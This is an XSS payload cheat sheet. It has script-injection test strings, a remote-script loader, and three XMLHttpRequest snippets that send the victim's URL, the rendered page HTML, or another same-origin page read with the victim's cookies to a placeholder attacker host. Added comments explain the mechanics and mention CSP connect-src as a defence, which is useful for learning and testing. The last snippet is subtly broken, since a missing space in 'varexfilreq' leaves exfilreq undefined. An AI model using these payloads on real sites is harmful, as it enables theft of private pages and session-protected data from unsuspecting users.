
Cross-Site Scripting (XSS)

Test payloads

<img src="http://<attacker url>">
<script>document.location="http://<attacker url>"</script>

<script>alert("testing123")</script>

Execute remote XSS payload

<script src="http://<attacker>/xss.js"></script>

Effective exploitation examples

Get the current location (URL) of the web page
// Sends the victim page's URL to an attacker-controlled host: document.location
// is coerced to its href string and appended to the request path, so the full
// URL (path and query string included) leaves the origin in the GET line.
// The third argument to open() is false, i.e. the request is synchronous and
// blocks the page until it completes.
// Defender view: an outbound request to an unexpected host that carries the
// current URL. A Content-Security-Policy `connect-src` directive limited to
// trusted origins makes the browser block this XMLHttpRequest.
var exfilreq = new XMLHttpRequest();    
exfilreq.open("GET", "http://<attacker>/" + document.location, false);    
exfilreq.send();
Get the contents of the current page
// POSTs the serialized DOM of the current page (document.documentElement.outerHTML,
// i.e. the rendered markup as it exists at execution time, including content
// that is only present after login) to an attacker-controlled host. The request
// is synchronous (third argument to open() is false).
// Defender view: a cross-origin POST whose body is the page's own HTML; CSP
// `connect-src` restricts the destinations XMLHttpRequest may reach, and
// keeping secrets out of the rendered markup limits what such a post exposes.
var exfilreq = new XMLHttpRequest();    
exfilreq.open("POST", "http://<attacker>/", false);    
exfilreq.send(document.documentElement.outerHTML);
Get the contents of a specified web page
// Two-step read of another same-origin page: pagereq fetches '/<web page>' with
// the victim's cookies (same-origin request, so the browser attaches them), and
// once the response is complete (readyState == 4, DONE) the handler POSTs the
// response body to an attacker-controlled host.
// Defender view: this is why XSS defeats same-origin protections for every
// page the victim can reach, not just the injected one. CSP `connect-src`
// blocks the outbound POST; short-lived sessions and re-authentication for
// sensitive pages reduce what a single injection can read.
var pagereq = new XMLHttpRequest();    
pagereq.onreadystatechange = function() {              
  if (pagereq.readyState == 4) {                       
    // Response is complete; forward it off-origin.
    varexfilreq = new XMLHttpRequest();                    
   exfilreq.open("POST", "http://<attacker>/", false);                                                      
   exfilreq.send(pagereq.response);                 
  }     
};    
// Synchronous GET of the target page on the victim's origin.
pagereq.open('GET', '/<web page>', false);    
pagereq.send();